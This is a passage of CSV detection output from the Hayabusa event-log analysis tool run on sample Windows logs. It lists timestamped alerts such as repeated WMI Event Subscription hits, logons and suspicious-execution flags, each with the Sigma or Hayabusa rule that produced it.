Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:46:57.850 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:48:29.225 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:48:29.850 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f43 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:58:14.879 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:32:03.644 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:35:43.160 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:37:00.910 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:41:07.910 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:44:49.144 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:48:33.988 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:49:28.191 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:57:47.863 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:00:03.457 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:02:44.129 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:02:44.129 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 